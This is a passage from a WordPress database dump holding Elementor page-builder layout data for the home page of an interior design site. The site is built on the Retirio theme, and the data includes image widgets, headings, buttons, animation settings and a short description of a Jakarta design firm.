flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(3363,4784,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(3364,4784,'_elementor_pro_version','3.8.1'),(3365,4784,'_elementor_css','a:6:{s:4:\"time\";i:1685012084;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:3:{i:0;s:0:\"\";i:1;s:7:\"ovaicon\";i:4;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3366,4785,'_wp_page_template','elementor_header_footer'),(3367,4785,'_elementor_edit_mode','builder'),(3368,4785,'_elementor_template_type','wp-page'),(3369,4785,'_elementor_version','3.8.1'),(3370,4785,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Philip-Johnson.jpg\",\"id\":1161,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/pexels-lina-kivaka-1841143.jpg\",\"id\":2991,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/armin-djuhic-mcL2f-J74GY-unsplash.jpg\",\"id\":2996,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/minh-pham-OtXADkUh3-I-unsplash.jpg\",\"id\":3001,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"LOREM IPSUM\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">LOREM IPSUM<\\/span><\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. <\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center 